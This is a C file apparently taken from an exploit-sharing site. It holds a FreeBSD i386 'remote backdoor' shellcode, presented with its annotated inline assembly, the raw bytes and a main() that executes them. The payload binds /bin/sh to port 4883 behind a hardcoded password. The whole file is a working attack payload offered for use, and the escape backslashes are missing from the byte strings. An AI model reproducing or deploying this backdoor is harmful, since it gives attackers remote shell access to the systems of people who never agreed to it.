/*
THE ZUGCODE - SMALL REMOTE 6ACKD0R
FreeBSD i386 bind shell with auth
code by MahDelin
Big thx SST [kaka, nolife, white]
Listen on the port 4883 the /bin/sh
*/
/*
void zugcode(void )
{
//socket
__asm__("xorl %eax, %eax");
__asm__("pushl %eax");
__asm__("pushl %eax");
__asm__("pushl $0x01");
__asm__("pushl $0x02");
__asm__("movl %esp, %ebp");
__asm__("pushl %ebp");
__asm__("movb $0x61, %al");
__asm__("int $0x80");
//struct sockaddr_in
__asm__("movl %eax, %edi");
__asm__("xorl %eax, %eax");
__asm__("movb $0x02, 9(%ebp)");
__asm__("movw $0x1313, 10(%ebp)");
__asm__("movl %eax, 12(%ebp)");
__asm__("leal 8(%ebp), %ecx");
//bind
__asm__("xor %ebx,%ebx");
__asm__("movb $0x10,%bl");
__asm__("push %ebx");
__asm__("push %ecx");
__asm__("push %edi");
__asm__("push %eax");
__asm__("movb $0x68, %al");
__asm__("int $0x80");
//listen
__asm__("xor %eax, %eax");
__asm__("pushl %eax");
__asm__("pushl $0x01");
__asm__("pushl %edi");
__asm__("pushl %eax");
__asm__("movb $0x6a, %al");
__asm__("int $0x80");
//accept
__asm__("xor %eax, %eax");
__asm__("push %ebx");
__asm__("pushl %eax");
__asm__("pushl %eax");
__asm__("pushl %edi");
__asm__("pushl %eax");
__asm__("movb $0x1e, %al");
__asm__("int $0x80");
__asm__("mov %eax, %esi");
__asm__("xor %eax, %eax");
__asm__("pushl $0x203a7465");
__asm__("pushl $0x72636573");
__asm__("movl %esp, %ebx");
__asm__("push %eax");
__asm__("push $0x8");
__asm__("pushl %ebx");
__asm__("push %esi");
__asm__("xor %eax, %eax");
__asm__("push %eax");
__asm__("movb $0x65, %al");
__asm__("int $0x80");
//rcev password
__asm__("xor %eax, %eax");
__asm__("pushl %ebp");
__asm__("movl %esp, %ebp");
__asm__("movb $0x20, %al");
__asm__("subl %eax, %esp");
__asm__("xor %eax, %eax");
__asm__("push %eax");
__asm__("mov $0x80, %al");
__asm__("push %eax");
__asm__("xor %eax, %eax");
__asm__("push %ebp");
__asm__("push %esi");
__asm__("push %eax");
__asm__("movb $0x66, %al");
__asm__("int $0x80");
//compare password
//save registers %esi, %edi
__asm__("mov %edi, %ebx");
__asm__("mov %esi, %edx");
__asm__("mov %eax, %ecx");
__asm__(".word 0x50eb");
__asm__("pop %esi");
__asm__("mov %ebp, %edi");
__asm__("repe cmpsb");
__asm__(".word 0x4275");
__asm__("mov %ebx, %edi");
__asm__("mov %edx, %esi");
//dup2 stdin
__asm__("xorl %eax, %eax");
__asm__("pushl %eax");
__asm__("pushl %esi");
__asm__("pushl %eax");
__asm__("movb $0x5a, %al");
__asm__("int $0x80");
//dup2 stdout
__asm__("xorl %eax, %eax");
__asm__("inc %eax");
__asm__("pushl %eax");
__asm__("pushl %esi");
__asm__("xorl %eax, %eax");
__asm__("pushl %eax");
__asm__("movb $0x5a, %al");
__asm__("int $0x80");
//dup2 stderr
__asm__("xorl %eax, %eax");
__asm__("add $0x2, %eax");
__asm__("pushl %eax");
__asm__("pushl %esi");
__asm__("xorl %eax, %eax");
__asm__("pushl %eax");
__asm__("movb $0x5a, %al");
__asm__("int $0x80");
// /bin/sh
__asm__("xor %ecx, %ecx");
__asm__("pushl %ecx");
__asm__("pushl $0x68732f2f");
__asm__("pushl $0x6e69622f");
__asm__("movl %esp, %ebx");
__asm__("pushl %ecx");
__asm__("pushl %ebx");
__asm__("movl %esp, %edx");
__asm__("pushl %ecx");
__asm__("pushl %edx");
__asm__("pushl %ebx");
__asm__("pushl %ecx");
__asm__("movb $0x3b, %al");
__asm__("int $0x80");
//exit
__asm__("xorl %eax, %eax");
__asm__("inc %eax");
__asm__("pushl %eax");
__asm__("pushl %eax");
__asm__("int $0x80");
__asm__(".byte 0xe8");
__asm__(".long 0xffffffab");
__asm__(".asciz "payhash12"");
}
*/
unsigned char zug[] =
"x31xc0x50x50x6ax01x6ax02x89xe5x55xb0x61xcdx80x89xc7x31"
"xc0xc6x45x09x02x66xc7x45x0ax13x13x89x45x0cx8dx4dx08x31"
"xdbxb3x10x53x51x57x50xb0x68xcdx80x31xc0x50x6ax01x57x50"
"xb0x6axcdx80x31xc0x53x50x50x57x50xb0x1excdx80x89xc6x31"
"xc0x68x65x74x3ax20x68x73x65x63x72x89xe3x50x6ax08x53x56"
"x31xc0x50xb0x65xcdx80x31xc0x55x89xe5xb0x20x29xc4x31xc0"
"x50xb0x80x50x31xc0x55x56x50xb0x66xcdx80x89xfbx89xf2x89"
"xc1xebx50x5ex89xefxf3xa6x75x42x89xdfx89xd6x31xc0x50x56"
"x50xb0x5axcdx80x31xc0x40x50x56x31xc0x50xb0x5axcdx80x31"
"xc0x83xc0x02x50x56x31xc0x50xb0x5axcdx80x31xc9x51x68x2f"
"x2fx73x68x68x2fx62x69x6ex89xe3x51x53x89xe2x51x52x53x51"
"xb0x3bxcdx80x31xc0x40x50x50xcdx80xe8xabxffxffxffx70x61"
"x79x68x61x73x68x0a";
main()
{
int (*zugcode)();
printf("shellcode len, %d bytes
", strlen(zug));
zugcode = (int (*)()) zug;
(int)(*zugcode)();
}
匿名 兑换PoC
京公网安备 11010502034610号
暂无评论